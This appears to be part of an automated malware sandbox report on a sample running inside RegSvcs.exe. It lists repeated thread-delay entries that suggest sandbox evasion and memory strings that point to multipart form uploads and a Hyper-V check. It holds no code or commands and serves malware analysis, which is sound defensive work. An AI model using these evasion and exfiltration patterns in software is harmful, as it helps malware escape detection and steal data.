Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596594 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596485 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596360 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596235 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 596110 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595989 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595860 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595735 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595610 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595485 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595360 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595235 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 595110 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594985 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594860 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594735 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594610 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594485 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594360 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594235 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 594110 | Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 593985 | Jump to behavior |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8ef22b264489d8b |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8fbc4f21be05b27< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f712acc9a62b48< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8feba111b94b28a< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f7e0be0674c8b3< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8efdae4bf20e674 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f5d05612c10071< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f14f701bfcdd04 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8ff79de852aef3c< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f09625e9a32898 |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.3807889102.0000000000658000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8fabef1428a4534< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8fccbafe45d97dd< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f0e844ff56e061 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.00000000023BC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8eb68e14b487c54 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f91ff279dd8d0f< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8ec375578b40b51 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8ee64085eb4bc03 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f3e59b2d07c3de< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f87fdccaba9215< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8ed9a1c3a16fd0e |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f5490925d8525e< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f33a64763ff211 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f25279886305f6 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f4a88838ff3edb< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8fde56e40640dd0< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8ec8d2668f338fa |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f678da0a83e01a< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f1b86f49c90312 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------90008829327ad14< |
Source: RegSvcs.exe, 00000001.00000002.3811760489.0000000005A2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWE |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8fa1b86304e06bd< |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8f2cf5bd6c5a375 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8eb012f83fd6770 |
Source: RegSvcs.exe, 00000001.00000002.3808692532.000000000253B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: qEmultipart/form-data; boundary=------------------------8ecfbdf275eedab |